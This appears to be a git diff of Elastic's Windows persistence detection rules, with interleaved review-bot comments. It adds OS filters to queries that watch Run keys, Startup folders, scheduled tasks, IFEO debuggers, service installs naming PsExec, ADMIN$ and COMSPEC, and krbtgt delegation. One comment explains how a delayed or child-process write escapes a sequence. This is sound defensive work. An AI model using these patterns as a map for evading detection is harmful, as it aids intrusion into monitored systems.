+ message:"'Don't Expire Password' - Enabled" and not user.id:"S-1-5-18"
 '''
diff --git a/rules/windows/persistence_driver_newterm_imphash.toml b/rules/windows/persistence_driver_newterm_imphash.toml
index 320b65e65..255a90647 100644
--- a/rules/windows/persistence_driver_newterm_imphash.toml
+++ b/rules/windows/persistence_driver_newterm_imphash.toml
@@ -4,7 +4,7 @@ maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup, New Term"
 min_stack_version = "8.6.0"
 integration = ["endpoint"]
-updated_date = "2023/01/23"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -27,7 +27,7 @@ timestamp_override = "event.ingested"
 type = "new_terms"
 query = '''
-event.category : "driver" and event.action : "load"
+event.category:"driver" and host.os.type:windows and event.action:"load"
 '''
diff --git a/rules/windows/persistence_evasion_hidden_local_account_creation.toml b/rules/windows/persistence_evasion_hidden_local_account_creation.toml
index b3bd725ce..124127312 100644
--- a/rules/windows/persistence_evasion_hidden_local_account_creation.toml
+++ b/rules/windows/persistence_evasion_hidden_local_account_creation.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -61,7 +61,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-registry where registry.path : "HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\*$\\"
+registry where host.os.type == "windows" and registry.path : "HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\*$\\"
 '''
diff --git a/rules/windows/persistence_evasion_registry_ifeo_injection.toml b/rules/windows/persistence_evasion_registry_ifeo_injection.toml
index a83eb10d1..90c498847 100644
--- a/rules/windows/persistence_evasion_registry_ifeo_injection.toml
+++ b/rules/windows/persistence_evasion_registry_ifeo_injection.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -28,7 +28,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-registry where length(registry.data.strings) > 0 and
+registry where host.os.type == "windows" and length(registry.data.strings) > 0 and
 registry.path : ("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\*.exe\\Debugger",
 "HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\*\\Debugger",
 "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\*\\MonitorProcess",
diff --git a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml
index 5dd7eb84b..4619537be 100644
--- a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml
+++ b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml
@@ -2,7 +2,7 @@ creation_date = "2021/03/15"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -77,7 +77,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-registry where
+registry where host.os.type == "windows" and
 registry.path : (
 "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Common Startup",
 "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Common Startup",
diff --git a/rules/windows/persistence_gpo_schtask_service_creation.toml b/rules/windows/persistence_gpo_schtask_service_creation.toml
index 396a61657..e8d64f51d 100644
--- a/rules/windows/persistence_gpo_schtask_service_creation.toml
+++ b/rules/windows/persistence_gpo_schtask_service_creation.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -30,7 +30,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where event.type != "deletion" and
+file where host.os.type == "windows" and event.type != "deletion" and
 file.path : ("?:\\Windows\\SYSVOL\\domain\\Policies\\*\\MACHINE\\Preferences\\ScheduledTasks\\ScheduledTasks.xml",
 "?:\\Windows\\SYSVOL\\domain\\Policies\\*\\MACHINE\\Preferences\\Services\\Services.xml") and
 not process.name : "dfsrs.exe"
diff --git a/rules/windows/persistence_local_scheduled_job_creation.toml b/rules/windows/persistence_local_scheduled_job_creation.toml
index 6f1b47e23..2e5cba9f7 100644
--- a/rules/windows/persistence_local_scheduled_job_creation.toml
+++ b/rules/windows/persistence_local_scheduled_job_creation.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -30,7 +30,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where event.type != "deletion" and
+file where host.os.type == "windows" and event.type != "deletion" and
 file.path : "?:\\Windows\\Tasks\\*" and file.extension : "job"
 '''
diff --git a/rules/windows/persistence_local_scheduled_task_creation.toml b/rules/windows/persistence_local_scheduled_task_creation.toml
index 62f235184..5480c2df6 100644
--- a/rules/windows/persistence_local_scheduled_task_creation.toml
+++ b/rules/windows/persistence_local_scheduled_task_creation.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -30,14 +30,14 @@ type = "eql"
 query = '''
 sequence with maxspan=1m
- [process where event.type != "end" and
+ [process where host.os.type == "windows" and event.type != "end" and
 ((process.name : ("cmd.exe", "wscript.exe", "rundll32.exe", "regsvr32.exe", "wmic.exe", "mshta.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe", "WmiPrvSe.exe", "wsmprovhost.exe", "winrshost.exe") or
 process.pe.original_file_name : ("cmd.exe", "wscript.exe", "rundll32.exe", "regsvr32.exe", "wmic.exe", "mshta.exe", "powershell.exe", "pwsh.dll", "powershell_ise.exe", "WmiPrvSe.exe", "wsmprovhost.exe", "winrshost.exe")) or
 process.code_signature.trusted == false)] by process.entity_id
- [process where event.type == "start" and
+ [process where host.os.type == "windows" and event.type == "start" and
 (process.name : "schtasks.exe" or process.pe.original_file_name == "schtasks.exe") and
 process.args : ("/create", "-create") and process.args : ("/RU", "/SC", "/TN", "/TR", "/F", "/XML") and
 /* exclude SYSTEM Integrity Level - look for task creations by non-SYSTEM user */
diff --git a/rules/windows/persistence_local_scheduled_task_scripting.toml b/rules/windows/persistence_local_scheduled_task_scripting.toml
index 0b93ac78a..0fa769689 100644
--- a/rules/windows/persistence_local_scheduled_task_scripting.toml
+++ b/rules/windows/persistence_local_scheduled_task_scripting.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -29,10 +29,10 @@ type = "eql"
 query = '''
 sequence by host.id with maxspan = 30s
- [any where (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and
+ [any where host.os.type == "windows" and (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and
 (dll.name : "taskschd.dll" or file.name : "taskschd.dll") and
 process.name : ("cscript.exe", "wscript.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe")]
- [registry where registry.path : "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\\Actions"]
+ [registry where host.os.type == "windows" and registry.path : "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\\Actions"]
 '''
diff --git a/rules/windows/persistence_ms_office_addins_file.toml b/rules/windows/persistence_ms_office_addins_file.toml
index f83141be7..7525b5f11 100644
--- a/rules/windows/persistence_ms_office_addins_file.toml
+++ b/rules/windows/persistence_ms_office_addins_file.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -27,7 +27,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where event.type != "deletion" and
+file where host.os.type == "windows" and event.type != "deletion" and
 file.extension : ("wll","xll","ppa","ppam","xla","xlam") and
 file.path : (
diff --git a/rules/windows/persistence_ms_outlook_vba_template.toml b/rules/windows/persistence_ms_outlook_vba_template.toml
index 2fa240431..4714f1593 100644
--- a/rules/windows/persistence_ms_outlook_vba_template.toml
+++ b/rules/windows/persistence_ms_outlook_vba_template.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -31,7 +31,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where event.type != "deletion" and
+file where host.os.type == "windows" and event.type != "deletion" and
 file.path : "C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Outlook\\VbaProject.OTM"
 '''
diff --git a/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml b/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml
index 686ef9119..860c88a99 100644
--- a/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml
+++ b/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -45,7 +45,8 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.action:modified-user-account and event.code:4738 and winlog.event_data.AllowedToDelegateTo:*krbtgt*
+event.action:modified-user-account and host.os.type:windows and event.code:4738 and
+ winlog.event_data.AllowedToDelegateTo:*krbtgt*
 '''
diff --git a/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml b/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml
index 63fc87dce..17f02f59c 100644
--- a/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml
+++ b/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml
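Review bot: The Outlook VBA template query hard-codes the drive letter in `file.path : "C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Outlook\\VbaProject.OTM"`, while other file rules touched by this same change use a drive wildcard (for example `"?:\\Users\\*\\Documents\\WindowsPowerShell\\*"` in persistence_powersshell_profiles.toml and `"?:\\Windows\\Tasks\\*"` in persistence_local_scheduled_job_creation.toml). A user profile relocated to another volume would not be covered as written, and the inconsistency makes it harder to audit path coverage across the rule set. Since the line is adjacent to the one being edited, `file.path : "?:\\Users\\*\\AppData\\Roaming\\Microsoft\\Outlook\\VbaProject.OTM"` would be the consistent form.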
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -34,7 +34,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.name: ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and
 process.args : "Set-CASMailbox*ActiveSyncAllowedDeviceIDs*"
 '''
diff --git a/rules/windows/persistence_powersshell_profiles.toml b/rules/windows/persistence_powersshell_profiles.toml
index eab9abbac..55125a8ab 100644
--- a/rules/windows/persistence_powersshell_profiles.toml
+++ b/rules/windows/persistence_powersshell_profiles.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -30,7 +30,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where event.type != "deletion" and
+file where host.os.type == "windows" and event.type != "deletion" and
 file.path : ("?:\\Users\\*\\Documents\\WindowsPowerShell\\*",
 "?:\\Users\\*\\Documents\\PowerShell\\*",
 "?:\\Windows\\System32\\WindowsPowerShell\\*") and
diff --git a/rules/windows/persistence_priv_escalation_via_accessibility_features.toml b/rules/windows/persistence_priv_escalation_via_accessibility_features.toml
index ecfbd4fbd..aedc038be 100644
--- a/rules/windows/persistence_priv_escalation_via_accessibility_features.toml
+++ b/rules/windows/persistence_priv_escalation_via_accessibility_features.toml
@@ -2,7 +2,7 @@ creation_date = "2020/02/18"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -86,7 +86,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.parent.name : ("Utilman.exe", "winlogon.exe") and user.name == "SYSTEM" and
 process.args : (
diff --git a/rules/windows/persistence_registry_uncommon.toml b/rules/windows/persistence_registry_uncommon.toml
index a6e8c2848..704561ff4 100644
--- a/rules/windows/persistence_registry_uncommon.toml
+++ b/rules/windows/persistence_registry_uncommon.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -28,7 +28,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-registry where
+registry where host.os.type == "windows" and
 /* uncomment once stable length(registry.data.strings) > 0 and */
 registry.path : (
 "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Terminal Server\\Install\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\*",
diff --git a/rules/windows/persistence_remote_password_reset.toml b/rules/windows/persistence_remote_password_reset.toml
index f729c5ac6..2ae771320 100644
--- a/rules/windows/persistence_remote_password_reset.toml
+++ b/rules/windows/persistence_remote_password_reset.toml
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -32,12 +32,12 @@ type = "eql"
 query = '''
 sequence by winlog.computer_name with maxspan=5m
- [authentication where event.action == "logged-in" and
+ [authentication where host.os.type == "windows" and event.action == "logged-in" and
 /* event 4624 need to be logged */
 winlog.logon.type : "Network" and event.outcome == "success" and source.ip != null and
 source.ip != "127.0.0.1" and source.ip != "::1"] by winlog.event_data.TargetLogonId
 /* event 4724 need to be logged */
- [iam where event.action == "reset-password" and
+ [iam where host.os.type == "windows" and event.action == "reset-password" and
 (
 /* This rule is very noisy if not scoped to privileged accounts, duplicate the
diff --git a/rules/windows/persistence_run_key_and_startup_broad.toml b/rules/windows/persistence_run_key_and_startup_broad.toml
index 8791a20c9..0f95bb1a1 100644
--- a/rules/windows/persistence_run_key_and_startup_broad.toml
+++ b/rules/windows/persistence_run_key_and_startup_broad.toml
@@ -2,7 +2,7 @@ creation_date = "2020/11/18"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -84,7 +84,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-registry where registry.data.strings != null and
+registry where host.os.type == "windows" and registry.data.strings != null and
 registry.path : (
 /* Machine Hive */
 "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*",
diff --git a/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml b/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml
index 1852a0066..2fd316ca4 100644
--- a/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml
+++ b/rules/windows/persistence_runtime_run_key_startup_susp_procs.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -26,9 +26,9 @@ type = "eql"
 query = '''
 /* userinit followed by explorer followed by early child process of explorer (unlikely to be launched interactively) within 1m */
 sequence by host.id, user.name with maxspan=1m
- [process where event.type == "start" and process.name : "userinit.exe" and process.parent.name : "winlogon.exe"]
- [process where event.type == "start" and process.name : "explorer.exe"]
- [process where event.type == "start" and process.parent.name : "explorer.exe" and
+ [process where host.os.type == "windows" and event.type == "start" and process.name : "userinit.exe" and process.parent.name : "winlogon.exe"]
+ [process where host.os.type == "windows" and event.type == "start" and process.name : "explorer.exe"]
+ [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "explorer.exe" and
 /* add suspicious programs here */
 process.pe.original_file_name in ("cscript.exe", "wscript.exe",
diff --git a/rules/windows/persistence_scheduled_task_creation_winlog.toml b/rules/windows/persistence_scheduled_task_creation_winlog.toml
index ff0e183f9..6e8339161 100644
--- a/rules/windows/persistence_scheduled_task_creation_winlog.toml
+++ b/rules/windows/persistence_scheduled_task_creation_winlog.toml
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -27,7 +27,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-iam where event.action == "scheduled-task-created" and
+iam where host.os.type == "windows" and event.action == "scheduled-task-created" and
 /* excluding tasks created by the computer account */
 not user.name : "*$" and
diff --git a/rules/windows/persistence_scheduled_task_updated.toml b/rules/windows/persistence_scheduled_task_updated.toml
index e7b247eac..8f61fcdfd 100644
--- a/rules/windows/persistence_scheduled_task_updated.toml
+++ b/rules/windows/persistence_scheduled_task_updated.toml
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -28,7 +28,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-iam where event.action == "scheduled-task-updated" and
+iam where host.os.type == "windows" and event.action == "scheduled-task-updated" and
 /* excluding tasks created by the computer account */
 not user.name : "*$" and
diff --git a/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml b/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml
index 57c6db82c..b9e348a8a 100644
--- a/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml
+++ b/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -96,7 +96,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-any where event.action == "Directory Service Changes" and
+any where host.os.type == "windows" and event.action == "Directory Service Changes" and
 event.code == "5136" and
 winlog.event_data.AttributeLDAPDisplayName : "dSHeuristics" and
 length(winlog.event_data.AttributeValue) > 15 and
diff --git a/rules/windows/persistence_service_dll_unsigned.toml b/rules/windows/persistence_service_dll_unsigned.toml
index 59d94515f..1b72dd9e1 100644
--- a/rules/windows/persistence_service_dll_unsigned.toml
+++ b/rules/windows/persistence_service_dll_unsigned.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: dll.Ext.relative_file_creation_time is populated in Elastic Endpoint 8.4 and above."
 min_stack_version = "8.4.0"
-updated_date = "2023/01/17"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -25,7 +25,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-library where
+library where host.os.type == "windows" and
 process.executable : ("?:\\Windows\\System32\\svchost.exe", "?:\\Windows\\Syswow64\\svchost.exe") and
diff --git a/rules/windows/persistence_service_windows_service_winlog.toml b/rules/windows/persistence_service_windows_service_winlog.toml
index 934ed8f19..15e6625b3 100644
--- a/rules/windows/persistence_service_windows_service_winlog.toml
+++ b/rules/windows/persistence_service_windows_service_winlog.toml
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -55,7 +55,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-any where
+any where host.os.type == "windows" and
 (event.code : "4697" and
 (winlog.event_data.ServiceFileName : ("*COMSPEC*", "*\\172.0.0.1*", "*Admin$*", "*powershell*", "*rundll32*", "*cmd.exe*", "*PSEXESVC*",
diff --git a/rules/windows/persistence_services_registry.toml b/rules/windows/persistence_services_registry.toml
index b18ef8566..c6a37735a 100644
--- a/rules/windows/persistence_services_registry.toml
+++ b/rules/windows/persistence_services_registry.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -26,7 +26,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-registry where registry.path : ("HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ServiceDLL", "HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ImagePath") and
+registry where host.os.type == "windows" and registry.path : ("HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ServiceDLL", "HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ImagePath") and
 not registry.data.strings : ("?:\\windows\\system32\\Drivers\\*.sys",
 "\\SystemRoot\\System32\\drivers\\*.sys",
 "\\??\\?:\\Windows\\system32\\Drivers\\*.SYS",
diff --git a/rules/windows/persistence_startup_folder_file_written_by_suspicious_process.toml b/rules/windows/persistence_startup_folder_file_written_by_suspicious_process.toml
index 4adfc248f..a9a30c0db 100644
--- a/rules/windows/persistence_startup_folder_file_written_by_suspicious_process.toml
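Review bot: In the Windows service (4697) query, the `winlog.event_data.ServiceFileName` pattern `"*\\172.0.0.1*"` directly under the new `any where host.os.type == "windows" and` line looks like a typo for the loopback address: the neighbouring entries (`*Admin$*`, `*PSEXESVC*`, `*COMSPEC*`) are aimed at PsExec-style service binaries whose path is a UNC reference such as `\\127.0.0.1\ADMIN$`, and 172.0.0.1 is not a loopback or private address, so the pattern as written is unlikely to ever match the intended artifact. I would change it to `"*\\127.0.0.1*"` and, because the value is easy to misread, consider widening it to cover `localhost` as well; the pattern list continues past the end of the hunk, so there may be further entries to check the same way. This is pre-existing context rather than something the commit introduced, but it is in the hunk and cheap to fix here.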
+++ b/rules/windows/persistence_startup_folder_file_written_by_suspicious_process.toml
@@ -2,7 +2,7 @@ creation_date = "2020/11/18"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -86,7 +86,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where event.type != "deletion" and
+file where host.os.type == "windows" and event.type != "deletion" and
 user.domain != "NT AUTHORITY" and
 file.path : ("C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*",
 "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\*") and
diff --git a/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml b/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml
index 302a8cf01..d9702827d 100644
--- a/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml
+++ b/rules/windows/persistence_startup_folder_file_written_by_unsigned_process.toml
@@ -2,7 +2,7 @@ creation_date = "2020/11/29"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -81,7 +81,7 @@ type = "eql"
 query = '''
 sequence by host.id, process.entity_id with maxspan=5s
- [process where event.type == "start" and process.code_signature.trusted == false and
+ [process where host.os.type == "windows" and event.type == "start" and process.code_signature.trusted == false and
 /* suspicious paths can be added here */
 process.executable : ("C:\\Users\\*.exe",
 "C:\\ProgramData\\*.exe",
@@ -90,7 +90,7 @@ sequence by host.id, process.entity_id with maxspan=5s
 "C:\\Intel\\*.exe", "C:\\PerfLogs\\*.exe") ]
- [file where event.type != "deletion" and user.domain != "NT AUTHORITY" and
+ [file where host.os.type == "windows" and event.type != "deletion" and user.domain != "NT AUTHORITY" and
 file.path : ("C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*",
 "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\*") ]
diff --git a/rules/windows/persistence_startup_folder_scripts.toml b/rules/windows/persistence_startup_folder_scripts.toml
index 2575256f1..06ef11c8f 100644
--- a/rules/windows/persistence_startup_folder_scripts.toml
+++ b/rules/windows/persistence_startup_folder_scripts.toml
@@ -2,7 +2,7 @@ creation_date = "2020/11/18"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -85,7 +85,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where event.type != "deletion" and user.domain != "NT AUTHORITY" and
+file where host.os.type == "windows" and event.type != "deletion" and user.domain != "NT AUTHORITY" and
 /* detect shortcuts created by wscript.exe or cscript.exe */
 (file.path : "C:\\*\\Programs\\Startup\\*.lnk" and
diff --git a/rules/windows/persistence_suspicious_com_hijack_registry.toml b/rules/windows/persistence_suspicious_com_hijack_registry.toml
index ee10d0e29..cae0a4774 100644
--- a/rules/windows/persistence_suspicious_com_hijack_registry.toml
+++ b/rules/windows/persistence_suspicious_com_hijack_registry.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
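Review bot: The `[file where host.os.type == "windows" and ...]` step of the unsigned-process Startup-folder sequence is joined on `process.entity_id` under `maxspan=5s` (visible in the hunk header), which means only the unsigned binary itself, writing the Startup entry within five seconds of its own start, is caught; a dropper that sleeps first, or hands the write to a child such as cmd.exe or powershell.exe, falls outside the sequence and the sibling rule persistence_startup_folder_file_written_by_suspicious_process.toml does not fill that gap because it filters by `user.domain` and path rather than by signer. Whether five seconds is the right trade-off against noise is a tuning decision, but the query gives no hint that the window is deliberately tight, and the other sequences in this change run at 1m to 5m. I would at least record the intent next to the header: `/* 5s on purpose: catches immediate self-persistence by the unsigned binary only; delayed or child-process writes are out of scope here */`, and consider a longer window if telemetry shows it stays quiet. The `process.executable` path list that the first step matches on starts outside this hunk.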
@@ -74,7 +74,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-registry where
+registry where host.os.type == "windows" and
 /* not necessary but good for filtering privileged installations */
 user.domain != "NT AUTHORITY" and
diff --git a/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml b/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml
index a0ebcfe97..2f6a87f47 100644
--- a/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml
+++ b/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -35,7 +35,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-any where
+any where host.os.type == "windows" and
 (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and
 process.name : ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "MSPUB.EXE", "MSACCESS.EXE") and
